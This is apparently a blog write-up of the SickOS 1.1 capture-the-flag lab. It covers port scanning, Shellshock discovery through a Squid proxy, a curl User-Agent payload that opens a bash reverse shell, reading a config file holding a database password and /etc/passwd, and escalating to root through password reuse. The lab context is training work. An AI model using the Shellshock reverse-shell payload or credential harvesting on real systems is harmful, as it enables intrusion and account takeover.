SickOS 1.1

 

Welcome to my first CTF write-up, we’re going to start with something easily obtainable from our friends at VulnHub.

Our target today is the SickOS 1.1 CTF – you can download it direct here

It’s a fun exercise and easily approachable for beginners up to medium level experienced practitioners or just someone getting into hacking and want to understand hacking methodologies.

Before we get started, since I’m studying up for the OSCP certification I will avoid using tools such as Metasploit – learning how tools work manually is always good.

Let’s get at it then shall we?

Description:

Name........: SickOs1.1
Date Release: 11 Dec 2015
Author......: D4rk
Series......: SickOs
Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt

The objective of this lab is to compromise the network/machine and gain root privileges.

Are we ready?

I’m going to use netdiscover to find out what we have on our network and allow us to find our target machine.

Currently scanning: 192.168.1.0/16 | Screen View: Unique Hosts 
 
 6 Captured ARP Req/Rep packets, from 6 hosts. Total size: 360 
 _____________________________________________________________________________
 IP At MAC Address Count Len MAC Vendor / Hostname 
 -----------------------------------------------------------------------------
 192.168.1.1   -----redacted---- 1 60 unknown 
 192.168.1.2   -----redacted---- 1 60 unknown 
 192.168.1.129 -----redacted---- 1 60 unknown
 192.168.1.254 -----redacted---- 1 60 unknown

Our attack target will be 192.168.1.129. – let’s run an nmap scan and begin the enumeration process

root@Phoen1x:~# nmap -v -sS -A -n -T5 192.168.1.129

Starting Nmap 7.60 ( https://nmap.org ) at 2018-04-10 20:23 +07
 NSE: Loaded 146 scripts for scanning.
 NSE: Script Pre-scanning.
 Initiating NSE at 20:23
 Completed NSE at 20:23, 0.00s elapsed
 Initiating NSE at 20:23
 Completed NSE at 20:23, 0.00s elapsed
 Initiating ARP Ping Scan at 20:23
 Scanning 192.168.1.129 [1 port]
 Completed ARP Ping Scan at 20:23, 0.22s elapsed (1 total hosts)
 Initiating SYN Stealth Scan at 20:23
 Scanning 192.168.1.129 [1000 ports]
 Discovered open port 22/tcp on 192.168.1.129
 Discovered open port 3128/tcp on 192.168.1.129
 Completed SYN Stealth Scan at 20:23, 5.43s elapsed (1000 total ports)
 Initiating Service scan at 20:23
 Scanning 2 services on 192.168.1.129
 Completed Service scan at 20:23, 11.04s elapsed (2 services on 1 host)
 Initiating OS detection (try #1) against 192.168.1.129
 NSE: Script scanning 192.168.1.129.
 Initiating NSE at 20:23
 Completed NSE at 20:23, 0.54s elapsed
 Initiating NSE at 20:23
 Completed NSE at 20:23, 0.00s elapsed
 Nmap scan report for 192.168.1.129
 Host is up (0.00076s latency).
 Not shown: 997 filtered ports
 PORT STATE SERVICE VERSION
 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 | 1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
 | 2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
 |_ 256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
 3128/tcp open http-proxy Squid http proxy 3.1.19
 | http-open-proxy: Potentially OPEN proxy.
 |_Methods supported: GET HEAD
 |_http-server-header: squid/3.1.19
 |_http-title: ERROR: The requested URL could not be retrieved
 8080/tcp closed http-proxy
 MAC Address: 00:0C:29:1A:15:8B (VMware)
 Device type: general purpose
 Running: Linux 3.X|4.X
 OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
 OS details: Linux 3.2 - 4.8
 Uptime guess: 199.639 days (since Sat Sep 23 05:03:35 2017)
 Network Distance: 1 hop
 TCP Sequence Prediction: Difficulty=264 (Good luck!)
 IP ID Sequence Generation: All zeros
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
 HOP RTT ADDRESS
 1 0.76 ms 192.168.1.129

NSE: Script Post-scanning.
 Initiating NSE at 20:23
 Completed NSE at 20:23, 0.00s elapsed
 Initiating NSE at 20:23
 Completed NSE at 20:23, 0.00s elapsed
 Read data files from: /usr/bin/../share/nmap
 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
 Nmap done: 1 IP address (1 host up) scanned in 20.10 seconds
 Raw packets sent: 2041 (92.284KB) | Rcvd: 25 (1.160KB)

From the nmap scan, we can see that there is Squid HTTP Proxy running on 3128 – interesting. configured on port 3128.
This means there’s an HTTP Proxy – port 8080 is closed so we can imagine the website is being hosted on that server.
My first thought – Nikto! Let’s see what happens.

root@Phoen1x:~# nikto -h 192.168.1.129 -useproxy http://192.168.1.129:3128
 - Nikto v2.1.6
 ---------------------------------------------------------------------------
 + Target IP: 192.168.1.129
 + Target Hostname: 192.168.1.129
 + Target Port: 80
 + Proxy: 192.168.1.129:3128
 + Start Time: 2018-04-10 20:26:50 (GMT7)
 ---------------------------------------------------------------------------
 + Server: Apache/2.2.22 (Ubuntu)
 + Retrieved via header: 1.0 localhost (squid/3.1.19)
 + Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
 + The anti-clickjacking X-Frame-Options header is not present.
 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
 + Uncommon header 'x-cache' found, with contents: MISS from localhost
 + Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
 + Server leaks inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec 5 07:35:02 2015
 + Uncommon header 'tcn' found, with contents: list
 + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
 + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
 + Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
 + Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
 + Web Server returns a valid response with junk HTTP methods, this may cause false positives.
 + Uncommon header 'nikto-added-cve-2014-6271' found, with contents: true
 + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
 + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
 + OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
 + OSVDB-3233: /icons/README: Apache default file found.
 + 8347 requests: 0 error(s) and 21 item(s) reported on remote host
 + End Time: 2018-04-10 20:27:10 (GMT7) (20 seconds)
 ---------------------------------------------------------------------------
 + 1 host(s) tested
 Ok – so this turned out well – there’s definitely a website running and it’s thanks to Nikto we have discovered it’s vulnerable to Shellshock.

 

Let’s now get Firefox started up and set up the proxy accordingly and log in! Perhaps we can find out something more?

Since I’m using Firefox we will go to Options > Advanced > Network Settings > Connection Settings.

In the new window we will select Manual proxy configuration then set the HTTP Proxy to 192.168.1.129, and the port to 3128. [I’m sure you know how to do this!]

Once we have that set up, press OK and let’s navigate to 192.168.1.129 – let’s see what happens!

Screen Shot 2018-03-30 at 22.22.55

I’m not sure if that’s the best thing to see right now, but I’ll take it!
Clearly, we can access the website – shall we look at the source code for some hints?
Guess you found as much as I did – nothing! 😦

Let’s move on to the robots.txt – this usually always gives us something –

User-agent: *
Disallow: /
Dissalow: /wolfcms

Why, what big teeth you have… let’s find out what this is all about. Navigate to /wolfcms

Screen Shot 2018-03-30 at 22.42.58

 

So it’s a blog baring no meat, and after lots of looking around I found not much at stake here. Don’t get too bored, it’s about to get exciting, remember we found a shellshock vulnerability just before? Let’s take a hit at that by deploying a reverse TCP shell.

Let’s look here for some hints on manufacturing this sort of shell.

First things first, we have to set up a netcat listener. I like to use 9999 – you can use whatever you prefer.

root@Phoen1x:~# nc -lvp 9999
 listening on [any] 9999 ...

Now before we exploit Shellshock which is probably our best path forward – let’s understand what it actually is and how it works.

Shellshock – CVE-2014-6271 and CVE-2014-6278
Where : Found in the BASH command shell which (unfortunately or fortunately) is used in Linux distributions. was a serious vulnerability found in the Bash command shell, which is commonly used in Linux distributions.
What : Allows attackers to run arbitrary commands on affected systems – especially within the CGI Environment which is run on web servers.

Let’s get to the “How”.

Bash allows exporting shell functions to other instances.
This is done by using the environment variable with a function definition.

env ENV_VAR_FN=’() { <batmans function> };’

The ENV_VAR_FN function is executed inside the bash instance.
Problem is, due to an error in implementation it allows you to run additional code.
While it should read past the function definition “;” it continues to read forward – and that’s where you insert the fun bits of code!

env ENV_VAR_FN=’() { <batmans function> }; <evil code here>’

Here’s what a possible exploit could look like

GET /<server path> HTTP/1.1
User-agent: () { :;}; echo blahblah>/var/www/html/evil_file

This command would create an evil_file – with the attacker can use for malicious intent!

Let’s use the cURL command for this vulnerability – it allows us to send edited User-Agent information that the CGI Bash environment will accept. Fun right?

root@Phoen1x:~# curl -x http://192.168.1.129:3128 -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/192.168.1.128/9999 0>&1" http://192.168.1.129/cgi-bin/status

A few points to note
-x means to use a proxy
-H edits the User-Agent header
The code is a reverse tcp bash shell –
Did you look at your listener window? I’m sure you got a reverse shell on netcat!

root@Phoen1x:~# nc -lvp 9999
 listening on [any] 9999 ...
 192.168.1.129: inverse host lookup failed: Unknown host
 connect to [192.168.1.128] from (UNKNOWN) [192.168.1.129] 35628
 bash: no job control in this shell
 www-data@SickOs:/usr/lib/cgi-bin$

Shell established! NICE! Remember that meaty folder? wolfcms – let’s check it out.
Side note – do you have an “I’ve got shell” dance? You better come up with one right now.

www-data@SickOs:/$ cd var/www/wolfcms
 cd var/www/wolfcms
 www-data@SickOs:/var/www/wolfcms$ ls
 ls
 CONTRIBUTING.md
 README.md
 composer.json
 config.php
 docs
 favicon.ico
 index.php
 public
 robots.txt
 wolf

Let’s take a bite on that “config.php” file!

www-data@SickOs:/var/www/wolfcms$ cat config.php
 cat config.php
 <?php

// Database information:
 // for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
 // The path can only be absolute path or :memory:
 // For more info look at: www.php.net/pdo

// Database settings:
 define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
 define('DB_USER', 'root');
 define('DB_PASS', 'john@123');
 define('TABLE_PREFIX', '');

You seeing this? SQL Root username and password! JUICY!
Let’s try get into the MySQL server via localhost

www-data@SickOs:/var/www/wolfcms$ mysql -h localhost -P 3306 -u root -p wolf
mysql -h localhost -P 3306 -u root -p wolf
Enter password: john@123

Really… no dice – I was sure that would lead somewhere, but let’s not dive into that rabbit hole. Let’s quickly look elsewhere instead of wasting time on a potential distraction.

www-data@SickOs:/usr/lib/cgi-bin$ cat /etc/passwd
 cat /etc/passwd
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 syslog:x:101:103::/home/syslog:/bin/false
 messagebus:x:102:105::/var/run/dbus:/bin/false
 whoopsie:x:103:106::/nonexistent:/bin/false
 landscape:x:104:109::/var/lib/landscape:/bin/false
 sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
 sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
 mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

In hopes of the easiest kill and not to mention staring at this output for a while… the word SickOS finally stood out – is this a key? Will SSH work? With that same password we saw before?

root@Phoen1x:~# ssh sickos@192.168.1.129
 The authenticity of host '192.168.1.129 (192.168.1.129)' can't be established.
 ECDSA key fingerprint is SHA256:fBxcsD9oGyzCgdxtn34OtTEDXIW4E9/RlkxombNm0y8.
 Are you sure you want to continue connecting (yes/no)? yes
 Warning: Permanently added '192.168.1.129' (ECDSA) to the list of known hosts.
 sickos@192.168.1.129's password:
 Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)

* Documentation: https://help.ubuntu.com/

System information as of Tue Apr 10 19:37:02 IST 2018

System load: 0.0 Processes: 110
 Usage of /: 4.3% of 28.42GB Users logged in: 0
 Memory usage: 9% IP address for eth0: 192.168.1.129
 Swap usage: 0%

Graph this data and manage this system at:
 https://landscape.canonical.com/

124 packages can be updated.
 92 updates are security updates.

New release '14.04.3 LTS' available.
 Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Sep 22 08:32:44 2015
 sickos@SickOs:~$

Ok we’re in! I guess that’s a lesson learned for not using the same password everywhere (gotta write that down!?)

Now – remember this – the first thing you do when you get into a machine, check if you can get root priv’s

sickos@SickOs:~$ sudo su
 [sudo] password for sickos:
 root@SickOs:/home/sickos#

And there we go – root permissions – now let’s look for the flag

root@SickOs:/home/sickos# cd
 root@SickOs:~# cd /root
 root@SickOs:~# ls
 a0216ea4d51874464078c618298b1367.txt
 root@SickOs:~# cat a0216ea4d51874464078c618298b1367.txt
 If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
 Thanks for Trying

And we’re done!

Congrats, you’ve just conquered SickOS,

I felt the VM was a tad easier than I expected – but it did give me a good idea of how OSCP labs are structured, it was after all modeled after them.

Learning about shellshock was interesting and finding out how to exploit it was exciting.

Another thing I learned, don’t get stuck down the rabbit hole, for this instance accessing mysql didn’t work – fine, move on to the next one – don’t waste too much time working through something that could be a potential distraction.

This was my first conquest, and I’ve decided to do a few more. Mr. Robot, LazySysAdmin and Nineveh have been shortlisted.

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s